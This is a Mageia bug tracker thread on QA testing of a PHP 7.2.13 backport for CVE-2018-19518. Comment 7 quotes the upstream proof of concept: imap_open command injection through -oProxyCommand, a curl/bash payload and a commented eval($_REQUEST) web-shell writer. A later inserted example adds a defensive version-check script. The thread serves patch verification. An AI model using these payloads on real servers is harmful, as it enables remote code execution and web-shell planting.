Bug 23999 - Update php 7.2.x for CVE-2018-19518
Summary: Update php 7.2.x for CVE-2018-19518
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Backports
Version: 6
Hardware: All Linux
Priority: Normal normal
Target Milestone: ---
Assignee: QA Team
QA Contact:
URL:
Whiteboard: MGA6-64-OK
Keywords: validated_backport
Depends on:
Blocks: 23998
Reported: 2018-12-13 00:47 CET by Marc Krämer
Modified: 2018-12-17 20:36 CET

See Also:
Source RPM: php-7.2.11-3.mga6.src.rpm
CVE:
Status comment:


Description Marc Krämer 2018-12-13 00:47:47 CET
Backports update
Marc Krämer 2018-12-13 00:48:17 CET

Blocks: (none) => 23998

Comment 1 Marc Krämer 2018-12-13 00:52:30 CET
Suggested advisory:
========================

Updated php packages fix security vulnerabilities:

Bypassing disabled exec functions in PHP via imap_open (CVE-2018-19518).


References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19518
========================

Updated packages in core/backports_testing:
========================
php-ini-7.2.13-2.mga6
apache-mod_php-7.2.13-2.mga6
php-cli-7.2.13-2.mga6
php-cgi-7.2.13-2.mga6
lib64php_common7-7.2.13-2.mga6
php-devel-7.2.13-2.mga6
php-openssl-7.2.13-2.mga6
php-zlib-7.2.13-2.mga6
php-doc-7.2.13-2.mga6.noarch
php-bcmath-7.2.13-2.mga6
php-bz2-7.2.13-2.mga6
php-calendar-7.2.13-2.mga6
php-ctype-7.2.13-2.mga6
php-curl-7.2.13-2.mga6
php-dba-7.2.13-2.mga6
php-dom-7.2.13-2.mga6
php-enchant-7.2.13-2.mga6
php-exif-7.2.13-2.mga6
php-fileinfo-7.2.13-2.mga6
php-filter-7.2.13-2.mga6
php-ftp-7.2.13-2.mga6
php-gd-7.2.13-2.mga6
php-gettext-7.2.13-2.mga6
php-gmp-7.2.13-2.mga6
php-hash-7.2.13-2.mga6
php-iconv-7.2.13-2.mga6
php-imap-7.2.13-2.mga6
php-interbase-7.2.13-2.mga6
php-intl-7.2.13-2.mga6
php-json-7.2.13-2.mga6
php-ldap-7.2.13-2.mga6
php-mbstring-7.2.13-2.mga6
php-mysqli-7.2.13-2.mga6
php-mysqlnd-7.2.13-2.mga6
php-odbc-7.2.13-2.mga6
php-opcache-7.2.13-2.mga6
php-pcntl-7.2.13-2.mga6
php-pdo-7.2.13-2.mga6
php-pdo_dblib-7.2.13-2.mga6
php-pdo_firebird-7.2.13-2.mga6
php-pdo_mysql-7.2.13-2.mga6
php-pdo_odbc-7.2.13-2.mga6
php-pdo_pgsql-7.2.13-2.mga6
php-pdo_sqlite-7.2.13-2.mga6
php-pgsql-7.2.13-2.mga6
php-phar-7.2.13-2.mga6
php-posix-7.2.13-2.mga6
php-readline-7.2.13-2.mga6
php-recode-7.2.13-2.mga6
php-session-7.2.13-2.mga6
php-shmop-7.2.13-2.mga6
php-snmp-7.2.13-2.mga6
php-soap-7.2.13-2.mga6
php-sockets-7.2.13-2.mga6
php-sqlite3-7.2.13-2.mga6
php-sysvmsg-7.2.13-2.mga6
php-sysvsem-7.2.13-2.mga6
php-sysvshm-7.2.13-2.mga6
php-tidy-7.2.13-2.mga6
php-tokenizer-7.2.13-2.mga6
php-xml-7.2.13-2.mga6
php-xmlreader-7.2.13-2.mga6
php-xmlrpc-7.2.13-2.mga6
php-xmlwriter-7.2.13-2.mga6
php-xsl-7.2.13-2.mga6
php-wddx-7.2.13-2.mga6
php-zip-7.2.13-2.mga6
php-fpm-7.2.13-2.mga6
phpdbg-7.2.13-2.mga6
php-debuginfo-7.2.13-2.mga6

Source RPMs:
php-7.2.13-2.mga6.src.rpm
Marc Krämer 2018-12-13 00:53:21 CET

Component: RPM Packages => Security
QA Contact: (none) => security
See Also: (none) => https://bugs.mageia.org/show_bug.cgi?id=23945
Assignee: mageia => qa-bugs

Comment 2 Thomas Backlund 2018-12-13 19:26:48 CET
This is a backport

QA Contact: security => (none)
CC: (none) => tmb
Component: Security => Backports

Comment 3 Herman Viaene 2018-12-14 11:24:25 CET
There is a php-mcrypt in 5.6.39, none in 7.2.13 ?

CC: (none) => herman.viaene

Comment 4 Marc Krämer 2018-12-14 11:32:24 CET
In php 7 this is not bundled in main php. It is external (pecl) and is already in backports (version ~ 1.x)
Comment 5 Herman Viaene 2018-12-14 11:54:46 CET
Sorry, I don't get where you're pointing at.
The 5.X package is still installed and so are packages libtomcrypt0, libmcrypt4 and libmcrypt, but the one we need is still missing in this installation because:
$ php -S localhost:8000
[Fri Dec 14 11:43:17 2018] PHP Warning:  PHP Startup: Unable to load dynamic library 'mcrypt.so' (tried: /usr/lib/php/extensions/mcrypt.so (/usr/lib/php/extensions/mcrypt.so: undefined symbol: _zend_list_delete), /usr/lib/php/extensions/mcrypt.so.so (/usr/lib/php/extensions/mcrypt.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
[Fri Dec 14 11:43:19 2018] PHP Warning:  PHP Startup: Unable to load dynamic library 'apcu.so' (tried: /usr/lib/php/extensions/apcu.so (/usr/lib/php/extensions/apcu.so: undefined symbol: zval_used_for_init), /usr/lib/php/extensions/apcu.so.so (/usr/lib/php/extensions/apcu.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP 7.2.13 Development Server started at Fri Dec 14 11:43:20 2018
Listening on http://localhost:8000
Document root is /home/tester6/Documenten

But this does not block the http://localhost:8000/create-png.php to work correctly.
Comment 6 Marc Krämer 2018-12-14 12:01:12 CET
Both apcu and mcrypt are "extensions".
mcrypt is backported:
http://ftp.acc.umu.se/mirror/mageia/distrib/6/x86_64/media/core/backports/php-mcrypt-1.0.1-5.mga6.x86_64.rpm

APC is an optional cache, which is kind of obsolete, so I didn't backport this extension yet. All extensions should be bound to the php-version (5.6.x, 7.2.x), but this was missed. But I'll correct this for the mga7 release.
Comment 7 Len Lawrence 2018-12-14 18:33:29 CET
Trying this for x86_64.
Installed the php7.2 files from backports and ran a couple of tests.
Created file containing
"<?php phpinfo(); ?>"

$ php phpinfo.php | less
phpinfo()
PHP Version => 7.2.11
[...]
If you did not receive a copy of the PHP license, or have any
questions about PHP licensing, please contact license@php.net.

Started a server at localhost:8000
$ php -S localhost:8000 -t php
PHP 7.2.11 Development Server started at Fri Dec 14 16:37:14 2018
Listening on http://localhost:8000
Document root is /home/lcl/dev/php
Press Ctrl-C to quit.

Referring to comment 5: the apcu and mcrypt extensions were not installed but the server started up OK.

In a browser:
http://localhost:8000/create-png.php

That showed a blue square on a black background.

localhost:8000/sample.php
Showed:
Now hear this. This is you captain speaking.All hands on deck. Abandon ship. 

That is as far as I can take it.  What this package really needs is a test suite to properly exercise all or many of the functions.

There is a PoC for CVE-2018-19518 at https://bugs.php.net/bug.php?id=76428
which consists of two short scripts but without any instructions for running them that a newbie could understand.

Remote:
<?php
//File write:
//<?=eval('eval('.strtoupper('$_REQUEST').'["x"]);');?> -E shell.php}
//
//RCE:
//server=x -oProxyCommand="`curl$IFS''localhost?PWN`"}&login=1&password=1

imap_open('{'.$_POST['server'].':993/imap/ssl}INBOX', $_POST['login'], $_POST['password']);
?>

Local:

<?php
file_put_contents('x','touch /tmp/PWN');
chmod('x', 0755);
imap_open('{x -oProxyCommand="`bash$IFS\'\'x`"}', 0, 0);
unlink('x');
?>

Skipped those and updated from backports testing.
Restarted apache and ran the simple tests again.

phpinfo()
PHP Version => 7.2.13

The server logged:
[Fri Dec 14 17:23:15 2018] 127.0.0.1:48006 [200]: /sample.php
[Fri Dec 14 17:23:51 2018] 127.0.0.1:48016 [200]: /create-png.php

On the basis of these basic tests and a clean install this is OK for 64-bits.

CC: (none) => tarazed25

Len Lawrence 2018-12-14 18:33:53 CET

Whiteboard: (none) => MGA6-64-OK

Comment 8 PC LX 2018-12-14 19:50:44 CET
Installed and tested without issues.

Tests included several large and small scripts, common (e.g. wordpress, drupal, roundcube) and custom scripts. No regressions noticed.

System: Mageia 6, x86_64, Intel CPU.

$ uname -a
Linux marte 4.14.78-desktop-1.mga6 #1 SMP Sun Oct 21 20:31:12 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
$ rpm -qa | grep php.*-7.2 | sort
apache-mod_php-7.2.13-2.mga6
lib64php_common7-7.2.13-2.mga6
php-bz2-7.2.13-2.mga6
php-cli-7.2.13-2.mga6
php-ctype-7.2.13-2.mga6
php-curl-7.2.13-2.mga6
php-dom-7.2.13-2.mga6
php-fileinfo-7.2.13-2.mga6
php-filter-7.2.13-2.mga6
php-ftp-7.2.13-2.mga6
php-gd-7.2.13-2.mga6
php-gettext-7.2.13-2.mga6
php-hash-7.2.13-2.mga6
php-iconv-7.2.13-2.mga6
php-ini-7.2.13-2.mga6
php-intl-7.2.13-2.mga6
php-json-7.2.13-2.mga6
php-ldap-7.2.13-2.mga6
php-mbstring-7.2.13-2.mga6
php-mysqli-7.2.13-2.mga6
php-mysqlnd-7.2.13-2.mga6
php-openssl-7.2.13-2.mga6
php-pdo-7.2.13-2.mga6
php-pdo_mysql-7.2.13-2.mga6
php-pdo_pgsql-7.2.13-2.mga6
php-pdo_sqlite-7.2.13-2.mga6
php-pgsql-7.2.13-2.mga6
php-phar-7.2.13-2.mga6
php-posix-7.2.13-2.mga6
php-session-7.2.13-2.mga6
php-sysvsem-7.2.13-2.mga6
php-sysvshm-7.2.13-2.mga6
php-tokenizer-7.2.13-2.mga6
php-xml-7.2.13-2.mga6
php-xmlreader-7.2.13-2.mga6
php-xmlwriter-7.2.13-2.mga6
php-zip-7.2.13-2.mga6
php-zlib-7.2.13-2.mga6

CC: (none) => mageia

Comment 9 Len Lawrence 2018-12-15 01:18:49 CET
@ PC_LX.  Thanks for extending the tests.  Yours are probably a lot more useful.
Any idea about how the PoC could be run?  The mailbox stuff is way above my head.
Comment 10 PC LX 2018-12-15 13:36:26 CET
Tested the PoC in comment #7 and no external command was executed (e.g. touch /tmp/PWN) so I think it is fixed.

Had to install php-imap to make the test.

$ rpm -q php-imap
php-imap-7.2.13-2.mga6
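
An added example, not part of the original thread or of Mageia's QA tooling: a shell check that classifies a PHP 7.2 install against this fix, using the fixed version 7.2.13 from this bug and the point from comment 10 that php-imap must be installed for imap_open to exist. The `imap.enable_insecure_rsh` INI setting (upstream PHP's switch for rsh/ssh use in imap_open, not mentioned in this thread) and the function names `classify` and `probe` are assumptions of the example.

```sh
#!/bin/sh
# Added example: classify a PHP 7.2 install against CVE-2018-19518.
# Compares upstream version strings only; a distro may backport the
# fix into an older version number.
FIXED_PATCH=13   # 7.2.13 is the fixed 7.2.x release named in this bug

# classify VERSION IMAP_LOADED RSH_SETTING
#   VERSION      PHP version, e.g. 7.2.11
#   IMAP_LOADED  yes|no: is the imap extension (php-imap) loaded?
#   RSH_SETTING  value of imap.enable_insecure_rsh ("" if the build lacks it)
classify() {
    case $1 in
        7.2.*) patch=${1#7.2.}; patch=${patch%%[!0-9]*} ;;
        *) echo "out-of-scope"; return 0 ;;
    esac
    if [ "$2" != "yes" ]; then
        echo "not-applicable"            # imap_open() does not exist
    elif [ -z "$patch" ]; then
        echo "unknown"
    elif [ "$patch" -lt "$FIXED_PATCH" ]; then
        echo "vulnerable"
    elif [ "$3" = "1" ]; then
        echo "fixed-but-rsh-enabled"     # admin switched rsh/ssh back on
    else
        echo "fixed"
    fi
}

# probe: gather the three inputs from the php binary on PATH (CLI SAPI;
# mod_php or php-fpm may read a different php.ini).
probe() {
    ver=$(php -r 'echo PHP_VERSION;')
    if php -m | grep -qix 'imap'; then imap=yes; else imap=no; fi
    rsh=$(php -r 'echo ini_get("imap.enable_insecure_rsh");')
    classify "$ver" "$imap" "$rsh"
}

# Constructed samples: version, imap loaded, rsh setting.
for sample in "7.2.11 yes" "7.2.13 yes 0" "7.2.13 yes 1" "7.2.13 no 0"; do
    # shellcheck disable=SC2086  # word splitting of $sample is intended
    printf '%-14s -> %s\n' "$sample" "$(classify $sample)"
done
```

On a host with php-cli installed, call `probe` to classify the live install instead of the constructed samples.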
Comment 11 Len Lawrence 2018-12-15 13:56:29 CET
@PC_LX.  Don't know how you did it but thanks for running it and the hint about php-imap.
Comment 12 Lewis Smith 2018-12-15 21:04:45 CET
Thanks to all of you. Validating. No advisory for backports.

CC: (none) => lewyssmith
Keywords: (none) => validated_backport

Comment 13 Marc Krämer 2018-12-17 11:55:59 CET
Is there any more action missing?!
Comment 14 Thomas Backlund 2018-12-17 20:36:15 CET
packages moved

Resolution: (none) => FIXED
Status: NEW => RESOLVED
